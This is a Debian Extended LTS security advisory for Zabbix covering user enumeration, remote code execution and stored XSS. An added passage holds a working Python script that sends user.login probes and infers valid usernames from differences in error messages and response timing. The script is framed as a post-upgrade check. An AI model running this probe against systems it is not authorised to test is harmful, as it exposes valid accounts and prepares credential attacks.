ELA-406-1 zabbix security update
Package zabbix
Version 1:2.2.23+dfsg-0+deb8u2
Related CVEs CVE-2019-15132 CVE-2020-11800 CVE-2020-15803
Multiple vulnerabilities were discovered in Zabbix, a network monitoring solution. An attacker may remotely execute code on the Zabbix server, enumerate valid user names through the login handlers, and inject script into the Zabbix web frontend (stored XSS in the URL widget).
CVE-2019-15132
Zabbix allows User Enumeration. With login requests, it is possible to enumerate application usernames based on the variability of server responses (e.g., the “Login name or password is incorrect” and “No permissions for system access” messages, or just blocking for a number of seconds). This affects both api_jsonrpc.php and index.php.
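The following is an added example, not code from the advisory or from the Zabbix project, that shows how the oracle described above is checked for in practice. It groups login responses by error message and by whether the server stalled, and flags the user names whose signature differs from the bulk of the probes: on a vulnerable frontend those are the accounts that exist. The `user.login` JSON-RPC payload is the Zabbix API request sent to api_jsonrpc.php; the assumption that the error text sits in `error.data`, the one-second stall threshold and the sample responses are all constructed for this example, and `send_probe` is only included for use against a host you are authorised to test.

```python
"""Offline check for the CVE-2019-15132 username-enumeration oracle.

Added example, not Zabbix project code. Responses are grouped by
(error message, stalled?) and user names outside the most common
signature are reported as distinguishable, i.e. probably valid.
"""
import json
import time
import urllib.request
from collections import Counter

# Assumed threshold (not from the advisory): a login that takes at least
# this long is treated as the "blocking for a number of seconds" case.
STALL_SECONDS = 1.0


def login_payload(user, password="invalid-probe-password"):
    """JSON-RPC user.login request body for api_jsonrpc.php."""
    return {"jsonrpc": "2.0", "method": "user.login", "id": 1,
            "params": {"user": user, "password": password}}


def send_probe(url, user, timeout=10):
    """Live probe; assumes the error text is returned in error.data."""
    req = urllib.request.Request(
        url, data=json.dumps(login_payload(user)).encode(),
        headers={"Content-Type": "application/json-rpc"})
    t0 = time.monotonic()
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = json.load(resp)
    elapsed = time.monotonic() - t0
    return body.get("error", {}).get("data", ""), elapsed


def signature(message, elapsed):
    """Normalise one response into the pair the attacker can observe."""
    return (message.strip().rstrip("."), elapsed >= STALL_SECONDS)


def enumerate_from_responses(samples):
    """samples: iterable of (username, message, elapsed_seconds).

    Returns (leaks, distinguished): leaks is True when more than one
    signature was seen; distinguished lists the user names whose
    signature differs from the most common one.
    """
    sigs = {u: signature(m, t) for u, m, t in samples}
    counts = Counter(sigs.values())
    if len(counts) < 2:
        return False, []
    baseline = counts.most_common(1)[0][0]
    return True, sorted(u for u, s in sigs.items() if s != baseline)


# Constructed sample: four unknown names that all get the generic
# message quickly, one name that is throttled, one that gets a
# different message.
SAMPLE_RESPONSES = [
    ("alice",      "Login name or password is incorrect.", 0.05),
    ("bob",        "Login name or password is incorrect.", 0.06),
    ("carol",      "Login name or password is incorrect.", 0.04),
    ("monitor",    "Login name or password is incorrect.", 2.3),
    ("svc-backup", "No permissions for system access.",    0.05),
    ("dave",       "Login name or password is incorrect.", 0.05),
]

if __name__ == "__main__":
    leaks, users = enumerate_from_responses(SAMPLE_RESPONSES)
    print("responses distinguishable:", leaks, "->", users)
```

After upgrading, the same probe set against the fixed frontend should yield a single signature for existent and non-existent names alike; any remaining split means the oracle is still present (for example through index.php, which the same comparison covers if you feed it the form-login responses).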
CVE-2020-11800
Zabbix allows remote attackers to execute arbitrary code on the Zabbix server.
CVE-2020-15803
Zabbix allows stored XSS in the URL Widget.
For Debian 8 jessie, these problems have been fixed in version 1:2.2.23+dfsg-0+deb8u2.
We recommend that you upgrade your zabbix packages.
Further information about Extended LTS security advisories can be found at: https://deb.freexian.com/extended-lts/
A zabbix security update has been released for Debian GNU/Linux 8 Extended LTS to address multiple vulnerabilities.